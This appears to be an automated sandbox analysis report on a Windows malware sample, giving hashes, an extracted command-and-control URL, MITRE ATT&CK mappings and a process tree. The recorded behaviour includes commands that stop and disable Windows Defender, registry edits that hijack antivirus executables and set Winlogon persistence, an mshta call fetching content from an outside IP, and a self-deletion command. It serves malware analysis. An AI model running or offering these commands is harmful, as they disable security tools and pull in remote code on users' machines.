Analysis
-
max time kernel
150s -
max time network
117s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
21-09-2024 03:37
Static task
static1
Behavioral task
behavioral1
Sample
eeff0def88f30543c4b7f93976df37b4_JaffaCakes118.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
eeff0def88f30543c4b7f93976df37b4_JaffaCakes118.exe
Resource
win10v2004-20240910-en
General
-
Target
eeff0def88f30543c4b7f93976df37b4_JaffaCakes118.exe
-
Size
2.3MB
-
MD5
eeff0def88f30543c4b7f93976df37b4
-
SHA1
299b1944a074d04e1f3f23a05918eb2fd4542c4a
-
SHA256
1f59da5f8c3ed10ee6e27ca87592e3e81ab3cab6b7337ae40fae6a1e5887b243
-
SHA512
0335863a8d5c3cb968f67429fbc375943717c20393230da083a335f3d2540d8ec9434513f45113d504b7f389c982268628f91129c2db279b4e8ae1fd3ac43fa8
-
SSDEEP
49152:ukG9SpUleRvzfsEdDRUczjRO4Ye47YfW5I5GWMo/4abNpH1cZZ6k:uPSq6vzfJDRUczjfBGeF/4abNpVKZ6k
Malware Config
Extracted
http://78.26.187.108/soft-usage/favicon.ico?0=1200&1=VORHPBAB&2=i-s&3=99&4=7601&5=6&6=1&7=99600&8=1033
Signatures
-
Modifies WinLogon for persistence 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "C:\\Users\\Admin\\AppData\\Roaming\\qmypqy.exe" qmypqy.exe -
Blocklisted process makes network request 2 IoCs
flow pid Process 4 2844 mshta.exe 5 2844 mshta.exe -
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 20 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msseces.exe qmypqy.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msseces.exe\Debugger = "svchost.exe" qmypqy.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msseces.exe\Debugger = "svchost.exe" eeff0def88f30543c4b7f93976df37b4_JaffaCakes118.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msascui.exe eeff0def88f30543c4b7f93976df37b4_JaffaCakes118.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msmpeng.exe qmypqy.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msmpeng.exe\Debugger = "svchost.exe" qmypqy.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msascui.exe qmypqy.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msascui.exe\Debugger = "svchost.exe" qmypqy.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\egui.exe qmypqy.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ekrn.exe qmypqy.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\egui.exe eeff0def88f30543c4b7f93976df37b4_JaffaCakes118.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ekrn.exe eeff0def88f30543c4b7f93976df37b4_JaffaCakes118.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ekrn.exe\Debugger = "svchost.exe" eeff0def88f30543c4b7f93976df37b4_JaffaCakes118.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\egui.exe\Debugger = "svchost.exe" qmypqy.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ekrn.exe\Debugger = "svchost.exe" qmypqy.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msseces.exe eeff0def88f30543c4b7f93976df37b4_JaffaCakes118.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\egui.exe\Debugger = "svchost.exe" eeff0def88f30543c4b7f93976df37b4_JaffaCakes118.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msascui.exe\Debugger = "svchost.exe" eeff0def88f30543c4b7f93976df37b4_JaffaCakes118.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msmpeng.exe eeff0def88f30543c4b7f93976df37b4_JaffaCakes118.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msmpeng.exe\Debugger = "svchost.exe" eeff0def88f30543c4b7f93976df37b4_JaffaCakes118.exe -
Deletes itself 1 IoCs
pid Process 2724 cmd.exe -
Executes dropped EXE 1 IoCs
pid Process 2712 qmypqy.exe -
Loads dropped DLL 2 IoCs
pid Process 2272 eeff0def88f30543c4b7f93976df37b4_JaffaCakes118.exe 2272 eeff0def88f30543c4b7f93976df37b4_JaffaCakes118.exe -
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
-
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 2864 sc.exe 2256 sc.exe 2608 sc.exe 2092 sc.exe -
System Location Discovery: System Language Discovery 1 TTPs 8 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language qmypqy.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language eeff0def88f30543c4b7f93976df37b4_JaffaCakes118.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2712 qmypqy.exe 2712 qmypqy.exe 2712 qmypqy.exe 2712 qmypqy.exe 2712 qmypqy.exe 2712 qmypqy.exe 2712 qmypqy.exe 2712 qmypqy.exe 2712 qmypqy.exe 2712 qmypqy.exe 2712 qmypqy.exe 2712 qmypqy.exe 2712 qmypqy.exe 2712 qmypqy.exe 2712 qmypqy.exe 2712 qmypqy.exe 2712 qmypqy.exe 2712 qmypqy.exe 2712 qmypqy.exe 2712 qmypqy.exe 2712 qmypqy.exe 2712 qmypqy.exe 2712 qmypqy.exe 2712 qmypqy.exe 2712 qmypqy.exe 2712 qmypqy.exe 2712 qmypqy.exe 2712 qmypqy.exe 2712 qmypqy.exe 2712 qmypqy.exe 2712 qmypqy.exe 2712 qmypqy.exe 2712 qmypqy.exe 2712 qmypqy.exe 2712 qmypqy.exe 2712 qmypqy.exe 2712 qmypqy.exe 2712 qmypqy.exe 2712 qmypqy.exe 2712 qmypqy.exe 2712 qmypqy.exe 2712 qmypqy.exe 2712 qmypqy.exe 2712 qmypqy.exe 2712 qmypqy.exe 2712 qmypqy.exe 2712 qmypqy.exe 2712 qmypqy.exe 2712 qmypqy.exe 2712 qmypqy.exe 2712 qmypqy.exe 2712 qmypqy.exe 2712 qmypqy.exe 2712 qmypqy.exe 2712 qmypqy.exe 2712 qmypqy.exe 2712 qmypqy.exe 2712 qmypqy.exe 2712 qmypqy.exe 2712 qmypqy.exe 2712 qmypqy.exe 2712 qmypqy.exe 2712 qmypqy.exe 2712 qmypqy.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2712 qmypqy.exe Token: SeShutdownPrivilege 2712 qmypqy.exe -
Suspicious use of FindShellTrayWindow 4 IoCs
pid Process 2712 qmypqy.exe 2712 qmypqy.exe 2712 qmypqy.exe 2712 qmypqy.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 2712 qmypqy.exe 2712 qmypqy.exe -
Suspicious use of WriteProcessMemory 28 IoCs
description pid Process procid_target PID 2272 wrote to memory of 2864 2272 eeff0def88f30543c4b7f93976df37b4_JaffaCakes118.exe 30 PID 2272 wrote to memory of 2864 2272 eeff0def88f30543c4b7f93976df37b4_JaffaCakes118.exe 30 PID 2272 wrote to memory of 2864 2272 eeff0def88f30543c4b7f93976df37b4_JaffaCakes118.exe 30 PID 2272 wrote to memory of 2864 2272 eeff0def88f30543c4b7f93976df37b4_JaffaCakes118.exe 30 PID 2272 wrote to memory of 2256 2272 eeff0def88f30543c4b7f93976df37b4_JaffaCakes118.exe 31 PID 2272 wrote to memory of 2256 2272 eeff0def88f30543c4b7f93976df37b4_JaffaCakes118.exe 31 PID 2272 wrote to memory of 2256 2272 eeff0def88f30543c4b7f93976df37b4_JaffaCakes118.exe 31 PID 2272 wrote to memory of 2256 2272 eeff0def88f30543c4b7f93976df37b4_JaffaCakes118.exe 31 PID 2272 wrote to memory of 2712 2272 eeff0def88f30543c4b7f93976df37b4_JaffaCakes118.exe 34 PID 2272 wrote to memory of 2712 2272 eeff0def88f30543c4b7f93976df37b4_JaffaCakes118.exe 34 PID 2272 wrote to memory of 2712 2272 eeff0def88f30543c4b7f93976df37b4_JaffaCakes118.exe 34 PID 2272 wrote to memory of 2712 2272 eeff0def88f30543c4b7f93976df37b4_JaffaCakes118.exe 34 PID 2272 wrote to memory of 2724 2272 eeff0def88f30543c4b7f93976df37b4_JaffaCakes118.exe 35 PID 2272 wrote to memory of 2724 2272 eeff0def88f30543c4b7f93976df37b4_JaffaCakes118.exe 35 PID 2272 wrote to memory of 2724 2272 eeff0def88f30543c4b7f93976df37b4_JaffaCakes118.exe 35 PID 2272 wrote to memory of 2724 2272 eeff0def88f30543c4b7f93976df37b4_JaffaCakes118.exe 35 PID 2712 wrote to memory of 2608 2712 qmypqy.exe 37 PID 2712 wrote to memory of 2608 2712 qmypqy.exe 37 PID 2712 wrote to memory of 2608 2712 qmypqy.exe 37 PID 2712 wrote to memory of 2608 2712 qmypqy.exe 37 PID 2712 wrote to memory of 2092 2712 qmypqy.exe 38 PID 2712 wrote to memory of 2092 2712 qmypqy.exe 38 PID 2712 wrote to memory of 2092 2712 qmypqy.exe 38 PID 2712 wrote to memory of 2092 2712 qmypqy.exe 38 PID 2712 wrote to memory of 2844 2712 qmypqy.exe 41 PID 2712 wrote to memory of 2844 2712 qmypqy.exe 41 PID 2712 wrote to memory of 2844 2712 qmypqy.exe 41 PID 2712 wrote to memory of 2844 2712 qmypqy.exe 41
Processes
-
C:\Users\Admin\AppData\Local\Temp\eeff0def88f30543c4b7f93976df37b4_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\eeff0def88f30543c4b7f93976df37b4_JaffaCakes118.exe"1⤵
- Event Triggered Execution: Image File Execution Options Injection
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2272 -
C:\Windows\SysWOW64\sc.exesc stop WinDefend2⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2864
-
-
C:\Windows\SysWOW64\sc.exesc config WinDefend start= disabled2⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2256
-
-
C:\Users\Admin\AppData\Roaming\qmypqy.exeC:\Users\Admin\AppData\Roaming\qmypqy.exe2⤵
- Modifies WinLogon for persistence
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2712 -
C:\Windows\SysWOW64\sc.exesc stop WinDefend3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2608
-
-
C:\Windows\SysWOW64\sc.exesc config WinDefend start= disabled3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2092
-
-
C:\Windows\SysWOW64\mshta.exemshta.exe "http://78.26.187.108/soft-usage/favicon.ico?0=1200&1=VORHPBAB&2=i-s&3=99&4=7601&5=6&6=1&7=99600&8=1033"3⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
PID:2844
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\EEFF0D~1.EXE" >> NUL2⤵
- Deletes itself
- System Location Discovery: System Language Discovery
PID:2724
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Winlogon Helper DLL
1Create or Modify System Process
2Windows Service
2Event Triggered Execution
1Image File Execution Options Injection
1Privilege Escalation
Boot or Logon Autostart Execution
1Winlogon Helper DLL
1Create or Modify System Process
2Windows Service
2Event Triggered Execution
1Image File Execution Options Injection
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2.3MB
MD5eeff0def88f30543c4b7f93976df37b4
SHA1299b1944a074d04e1f3f23a05918eb2fd4542c4a
SHA2561f59da5f8c3ed10ee6e27ca87592e3e81ab3cab6b7337ae40fae6a1e5887b243
SHA5120335863a8d5c3cb968f67429fbc375943717c20393230da083a335f3d2540d8ec9434513f45113d504b7f389c982268628f91129c2db279b4e8ae1fd3ac43fa8